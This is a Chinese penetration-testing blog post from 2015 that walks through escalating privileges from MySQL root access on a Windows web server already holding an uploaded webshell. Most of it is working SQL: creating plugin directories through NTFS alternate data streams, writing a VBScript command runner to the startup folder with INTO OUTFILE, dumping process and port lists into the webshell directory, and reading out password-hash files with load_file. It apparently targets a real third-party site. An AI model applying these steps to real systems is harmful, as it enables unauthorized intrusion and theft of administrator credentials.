巧用root提权

CracerCracer 2015-12-22 渗透测试 1,141 0 3

直接上传了一个udf.php,看了下情况
版本大于mysql5.0 dll要导出到mysql.exe目录\lib\plugin ,默认不存在\lib\plugin目录,需要用NTFS ads 引流来创建

1
2
3
4
5
6
select @@basedir;
//查找到mysql的目录 这里回显:D:\Huweishen.com\PHPWEB\MySQL Server 5.5
select 'It is dll' into dumpfile 'D:\\Huweishen.com\\PHPWEB\\MySQL Server 5.5\\lib::$INDEX_ALLOCATION';
//利用NTFS ADS创建lib目录 注意路径的替换。还有\换成\\
select 'It is dll' into dumpfile 'D:\\Huweishen.com\\PHPWEB\\MySQL Server 5.5\\lib\\plugin::$INDEX_ALLOCATION';
//利用NTFS ADS创建plugin目录

1

这样啊  adminlm来的时候已经创建了  已经存在目录

1
File 'D:\Huweishen.com\PHPWEB\MySQL Server 5.5\lib\plugin::$INDEX_ALLOCATION' already exists

导出试试看  估计不行  要不然adminlm、早拿下了

2

mof我也不测试哦了,估计也是不行  因为这个鸟东西在,护卫神!!

3

写启动项添加用户我也不测试了  万一上面有什么防护软件直接就阻止了

 

思路还有的,三行代码导hash,破解。ok

然后有人不服,你破解出来又如何,端口你知道????

哦,我不知道,但是我还是可以查。。。看操作吧

 

建表:

1
create table binghe (cmd text);

好了,我们创建了一个新的表,表名为binghe,表中只存放一个字段,字段名为cmd,为text文本。
在表中插入内容

1
insert into binghe values ("set wshshell=createobject (""wscript.shell"" ) " );

插入三行代码导出hash,三行代码不予公布,免得众人装逼

1
insert into binghe values ("b=wshshell.run (""c0de1 & c0de2 & code3"",0) " );

三行代码运行之后会在启动目录生成三个文件,到时候loadfile读取,然后本地破解就可以获得管理密码

那么如何获得端口号??

呵呵,这样来
先找到终端服务对应的pid 并将结果写入(>)shell目录的binghe.txt

1
2
insert into binghe values ("b=wshshell.run (""tasklist /svc | find "termservice">D:/wwwroot/adpcd.com/include/binghe.txt"",0) " );
注:这里的D:/wwwroot/adpcd.com/include/ 属于webshell目录

再来,查询端口服务,并将结果追加写入(>>)shell目录的binghe.txt

1
2
insert into binghe values ("b=wshshell.run (""netstat -ano>>D:/wwwroot/adpcd.com/include/binghe.txt"",0) " );
注:这里的D:/wwwroot/adpcd.com/include/ 属于webshell目录

看看我在shell上面的实际操作

4

s这里打了性感的马赛克

5

6

7

来查一下是不是写进去了??

1
select * from binghe;

如图,哈哈,不错

8

好了,一切完毕  开始导出到启动项

1
select * from binghe into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\binghe.vbs";

再来loadfile看看 应该写进去了

9

重启之后,按照我的预想,会在D:/wwwroot/adpcd.com/include/这个目录下生成一个Binghe.txt(内容包括termservice进程服务的pid和端口细节及对应pid,会提权的人都知道这两个pid对比就会获得终端端口号)  ,另外在启动目录会生成三个hash的文件,命令如下:

1
select load_file('c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\file1') into dumpfile 'D:/wwwroot/adpcd.com/include/binghe1.txt'

select load_file('c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\file1') into dumpfile 'D:/wwwroot/adpcd.com/include/binghe2.txt'

select load_file('c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\file1') into dumpfile 'D:/wwwroot/adpcd.com/include/binghe3.txt'

注:file1\file2\file3 分别为三个hash文件

转载请注明来自Cracer,本文标题:《巧用root提权》

喜欢 (3) 发布评论
发表评论


Top